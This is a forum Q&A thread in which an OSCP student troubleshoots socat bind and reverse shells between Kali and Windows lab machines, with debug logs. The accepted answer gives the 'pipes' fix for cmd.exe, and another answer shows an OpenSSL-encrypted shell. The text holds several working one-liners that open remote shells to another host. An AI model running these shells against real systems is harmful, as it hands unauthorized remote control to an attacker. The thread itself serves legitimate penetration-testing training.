# Socat - How to create a windows reverse shell

Tags: linux, windows, bash, shell

I recently upgraded my OSCP material to get the new OSCP version 2020 and I came across the chapter with socat to create encrypted bind shell/reverse shell. I thought I understood how to use it, but my attempts to send an encrypted reverse shell from my windows machine to my Kali machine has been unsuccessfuls. I decided to do some trials and error with an unencrypted bind shell on both sides.

**Here is what worked for me :**

- Kali Bind Shell (Getting /bin/bash on Windows by connecting to the kali binded shell socket)
- Kali Reverse Shell (Getting /bin/bash on Windows by sending it to the windows listening socket)

**Here's what did not worked for me :**

- Windows Bind Shell (Getting cmd.exe by connecting to the windows listening shell socket)
- Windows Reverse Shell (Getting cmd.exe by sending it to the Kali listening socket)

**Here is what i did :**

**Kali Bind Shell - OK**

*Kali (192.168.119.145)*

`socat -d -d -d TCP4-LISTEN:4444,fork EXEC:/bin/bash`

*Windows 10 (192.168.145.10)*

`socat -d -d -d - TCP4:192.168.119.145:4444`

**Kali Reverse Shell - OK**

*Windows 10 (192.168.145.10)*

`socat -d -d -d TCP4-LISTEN:4444,fork STDOUT`

*Kali (192.168.119.145)*

`socat -d -d -d TCP4:192.168.145.10:4444 EXEC:/bin/bash`

**Windows Bind Shell - NOT OK**

*Windows 10 (192.168.145.10)*

`socat -d -d -d TCP4-LISTEN:4444,fork EXEC:cmd.exe`

*Kali (192.168.119.145)*

`socat -d -d -d - TCP4:192.168.145.10:4444`

**Windows Reverse Shell - NOT OK**

*Kali (192.168.119.145)*

`socat -d -d -d TCP4-LISTEN:4444,fork STDOUT`

*Windows 10 (192.168.145.10)*

`socat -d -d -d TCP4:192.168.119.145:4444 EXEC:cmd.exe`

**Here is what I get :**

**Windows bind shell - Windows Machine**

```
C:\Windows\system32>socat -d -d -d TCP4-LISTEN:443,fork EXEC:cmd.exe
2020/02/18 10:22:04 socat[3712] I socat by Gerhard Rieger and contributors - see www.dest-unreach.org
2020/02/18 10:22:04 socat[3712] I This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit. (http://www.openssl.org/)
2020/02/18 10:22:04 socat[3712] I This product includes software written by Tim Hudson (tjh@cryptsoft.com)
2020/02/18 10:22:04 socat[3712] I setting option "fork" to 1
2020/02/18 10:22:04 socat[3712] I socket(2, 1, 6) -> 5
2020/02/18 10:22:04 socat[3712] I starting accept loop
2020/02/18 10:22:04 socat[3712] N listening on AF=2 0.0.0.0:443
2020/02/18 10:22:25 socat[3712] I accept(5, {2, AF=2 192.168.119.145:36796}, 16) -> 6
2020/02/18 10:22:25 socat[3712] N accepting connection from AF=2 192.168.119.145:36796 on AF=2 192.168.145.10:443
2020/02/18 10:22:25 socat[3712] I permitting connection from AF=2 192.168.119.145:36796
2020/02/18 10:22:25 socat[3712] N forked off child process 4252
2020/02/18 10:22:25 socat[4252] I just born: child proces2020/02/18 10:22:25 socat[3712] I close(6)
2020/02/18 10:22:25 socat[4252] I just born: child process 4252
2020/02/18 10:22:25 socat[4252] I close(5)stening
2020/02/18 10:22:25 socat[4252] N forking off child, using socket for reading and writing
2020/02/18 10:22:25 socat[4252] I socketpair(1, 1, 0, {5,7}) -> 0
2020/02/18 10:22:25 socat[4252] N forked off child process 56402020/02/18 10:22:25 socat[5640] I just born: child proces
2020/02/18 10:22:25 socat[4252] N forked off child process 5640
2020/02/18 10:22:25 socat[5640] I close(5)
2020/02/18 10:22:25 socat[5640] I dup2(7, 0) -> 0
2020/02/18 10:22:25 socat[5640] I dup2(7, 1) -> 1ened all sock addresses
2020/02/18 10:22:25 socat[5640] I close(7) data transfer loop with FDs [6,6] and [5,5]
2020/02/18 10:22:25 socat[5640] N execvp'ing "cmd.exe"
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
2020/02/18 10:22:25 socat[4252] W read(5, 0x20044610, 8192): Connection reset by peer
2020/02/18 10:22:25 socat[3712] N childdied(): handling signal 202020/02/18 10:22:25 socat[4252] I childdied(signum=20)
2020/02/18 10:22:25 socat[4252] I waitpid(): child 5640 exited with status 0
2020/02/18 10:22:25 socat[4252] I childdied() finishedANG): No child processes
2020/02/18 10:22:25 socat[4252] N socket 2 to socket 1 is in error
2020/02/18 10:22:25 socat[4252] N socket 2 (fd 5) is at EOF
2020/02/18 10:22:25 socat[4252] I shutdown(6, 1)
2020/02/18 10:22:25 socat[4252] I terminated child did not leave data for us
2020/02/18 10:22:25 socat[4252] I poll timed out (no data within 0.500000 seconds)
2020/02/18 10:22:25 socat[4252] I shutdown(6, 2)
2020/02/18 10:22:25 socat[4252] I shutdown(5, 2)
2020/02/18 10:22:25 socat[4252] N exiting with status 0
2020/02/18 10:22:25 socat[3712] N childdied(): handling signal 20
2020/02/18 10:22:25 socat[3712] I childdied(signum=20)
2020/02/18 10:22:25 socat[3712] I childdied(20): cannot identify child 4252
2020/02/18 10:22:25 socat[3712] I waitpid(): child 4252 exited with status 0
2020/02/18 10:22:25 socat[3712] I waitpid(-1, {}, WNOHANG): No child processes
2020/02/18 10:22:25 socat[3712] I childdied() finished
```

**Windows Bind Shell - Kali Machine**

```
root@kali:/mnt/hgfs/Shared/OSCPLabsVPN/V2# socat -d -d -d - TCP4:192.168.145.10:443
2020/02/18 13:22:24 socat[9004] I socat by Gerhard Rieger and contributors - see www.dest-unreach.org
2020/02/18 13:22:24 socat[9004] I This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit (http://www.openssl.org/)
2020/02/18 13:22:24 socat[9004] I This product includes software written by Tim Hudson (tjh@cryptsoft.com)
2020/02/18 13:22:24 socat[9004] N reading from and writing to stdio
2020/02/18 13:22:24 socat[9004] N opening connection to AF=2 192.168.145.10:443
2020/02/18 13:22:24 socat[9004] I starting connect loop
2020/02/18 13:22:24 socat[9004] I socket(2, 1, 6) -> 5
2020/02/18 13:22:24 socat[9004] N successfully connected from local address AF=2 192.168.119.145:36796
2020/02/18 13:22:24 socat[9004] I resolved and opened all sock addresses
2020/02/18 13:22:24 socat[9004] N starting data transfer loop with FDs [0,1] and [5,5]
2020/02/18 13:22:25 socat[9004] N socket 2 (fd 5) is at EOF
2020/02/18 13:22:25 socat[9004] I poll timed out (no data within 0.500000 seconds)
2020/02/18 13:22:25 socat[9004] I shutdown(5, 2)
2020/02/18 13:22:25 socat[9004] N exiting with status 0
```

**Windows Reverse Shell - Kali Machine**

```
root@kali:/mnt/hgfs/Shared/OSCPLabsVPN/V2# socat -d -d -d TCP4-LISTEN:443 STDOUT
2020/02/18 13:07:13 socat[8925] I socat by Gerhard Rieger and contributors - see www.dest-unreach.org
2020/02/18 13:07:13 socat[8925] I This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit. (http://www.openssl.org/)
2020/02/18 13:07:13 socat[8925] I This product includes software written by Tim Hudson (tjh@cryptsoft.com)
2020/02/18 13:07:13 socat[8925] I socket(2, 1, 6) -> 5
2020/02/18 13:07:13 socat[8925] I starting accept loop
2020/02/18 13:07:13 socat[8925] N listening on AF=2 0.0.0.0:443
2020/02/18 13:07:18 socat[8925] I accept(5, {2, AF=2 192.168.145.10:61633}, 16) -> 6
2020/02/18 13:07:18 socat[8925] N accepting connection from AF=2 192.168.145.10:61633 on AF=2 192.168.119.145:443
2020/02/18 13:07:18 socat[8925] I permitting connection from AF=2 192.168.145.10:61633
2020/02/18 13:07:18 socat[8925] I close(5)
2020/02/18 13:07:18 socat[8925] N using stdout for reading and writing
2020/02/18 13:07:18 socat[8925] I resolved and opened all sock addresses
2020/02/18 13:07:18 socat[8925] N starting data transfer loop with FDs [6,6] and [1,1]
2020/02/18 13:07:18 socat[8925] N socket 1 (fd 6) is at EOF
2020/02/18 13:07:18 socat[8925] I poll timed out (no data within 0.500000 seconds)
2020/02/18 13:07:18 socat[8925] I shutdown(6, 2)
2020/02/18 13:07:18 socat[8925] N exiting with status 0
```

**Windows Reverse Shell - Windows Machine**

```
C:\Windows\system32>socat -d -d -d TCP4:192.168.119.145:443 EXEC:cmd.exe
2020/02/18 10:06:39 socat[5396] I socat by Gerhard Rieger and contributors - see www.dest-unreach.org
2020/02/18 10:06:39 socat[5396] I This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit. (http://www.openssl.org/)
2020/02/18 10:06:39 socat[5396] I This product includes software written by Tim Hudson (tjh@cryptsoft.com)
2020/02/18 10:06:39 socat[5396] N opening connection to AF=2 192.168.119.145:443
2020/02/18 10:06:39 socat[5396] I starting connect loop
2020/02/18 10:06:39 socat[5396] I socket(2, 1, 6) -> 5
2020/02/18 10:06:39 socat[5396] N successfully connected from local address AF=2 192.168.145.10:61630
2020/02/18 10:06:39 socat[5396] N forking off child, using socket for reading and writing
2020/02/18 10:06:39 socat[5396] I socketpair(1, 1, 0, {6,7}) -> 0
2020/02/18 10:06:39 socat[5396] N forked off child process 2688
2020/02/18 10:06:39 socat[2688] I just born: child process 2688
2020/02/18 10:06:39 socat[5396] N forked off child process 2688
2020/02/18 10:06:39 socat[5396] I close(7)
2020/02/18 10:06:39 socat[5396] I resolved and opened all sock addresses
2020/02/18 10:06:39 socat[5396] N starting data transfer loop with FDs [5,5] and [6,6]
2020/02/18 10:06:39 socat[2688] I close(6)
2020/02/18 10:06:39 socat[2688] I dup2(7, 0) -> 0
2020/02/18 10:06:39 socat[2688] I dup2(7, 1) -> 1
2020/02/18 10:06:39 socat[2688] I close(7)
2020/02/18 10:06:39 socat[2688] N execvp'ing "cmd.exe"
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
2020/02/18 10:06:39 socat[5396] W read(6, 0x20044228, 8192): Connection reset by peer
2020/02/18 10:06:39 socat[5396] N childdied(): handling signal 20
2020/02/18 10:06:39 socat[5396] I childdied(signum=20)
2020/02/18 10:06:39 socat[5396] I exec'd process 2688 on socket 1 terminated
2020/02/18 10:06:39 socat[5396] I waitpid(): child 2688 exited with status 0
2020/02/18 10:06:39 socat[5396] I waitpid(-1, {}, WNOHANG): No child processes
2020/02/18 10:06:39 socat[5396] I childdied() finished
2020/02/18 10:06:39 socat[5396] N socket 2 to socket 1 is in error
2020/02/18 10:06:39 socat[5396] N socket 2 (fd 6) is at EOF
2020/02/18 10:06:39 socat[5396] I shutdown(5, 1)
2020/02/18 10:06:39 socat[5396] I terminated child did not leave data for us
2020/02/18 10:06:39 socat[5396] I poll timed out (no data within 0.500000 seconds)
2020/02/18 10:06:39 socat[5396] I shutdown(5, 2)
2020/02/18 10:06:39 socat[5396] I shutdown(6, 2)
2020/02/18 10:06:39 socat[5396] N exiting with status 0
```

What am I doing wrong here ?

Why can't I attach a Windows cmd.exe process to a socket ?

**PS : I know the timestamps between my exemples doesn't match**

Answer (score 25, accepted):

To get the reverse shell from Windows add the 'pipes' command at the end:

Example:

Kali Box:
socat TCP4-LISTEN:443,fork STDOUT

Windows Box:
socat -d -d TCP4:192.168.X.X:443 EXEC:'cmd.exe',pipes

Comment: I found the answer yesterday while reading all the exemple in [the documentation](http://www.dest-unreach.org/socat/doc/socat.html#ADDRESS_TYPES)

Answer (score 0):

Windows machine (copy the .pem file from kali):

socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0 STDOUT

Kali machine:
socat OPENSSL:192.168.X.X:443,verify=0 EXEC:/bin/bash

Comment: I found the solution last night, but I'm still wondering why I need to add the pipes options.

Comment: Not super sure, but I believe cmd.exe needs that option to properly write to the connected pipes in a network.